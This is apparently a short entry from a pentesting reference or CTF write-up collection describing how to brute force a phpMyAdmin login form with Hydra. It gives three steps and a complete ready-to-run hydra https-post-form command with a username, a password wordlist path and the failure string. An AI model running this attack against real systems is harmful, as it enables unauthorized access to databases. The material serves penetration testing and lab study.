← Back to search

Brute Force phpMyAdmin Login with Hydra

exploitationtool

Summary

Example Hydra http(s)-post-form attack against a phpMyAdmin login, matching the "Incorrect password" failure string.

Walkthrough

A worked example of brute forcing a phpMyAdmin login form with Hydra.

Steps

  1. Target the login POST path and supply the known username with -l and a wordlist with -P.
  2. Include all required form fields (remember, login, proc_login) in the POSTDATA so the request is accepted.
  3. Use the failure string Incorrect password so Hydra knows which responses are wrong; the credential that omits it is valid.

Commands

bash

hydra <IP> -l 0xdf -P /usr/share/seclists/Passwords/twitter-banned.txt https-post-form "/db/index.php:password=^PASS^&remember=yes&login=Log+In&proc_login=true:Incorrect password"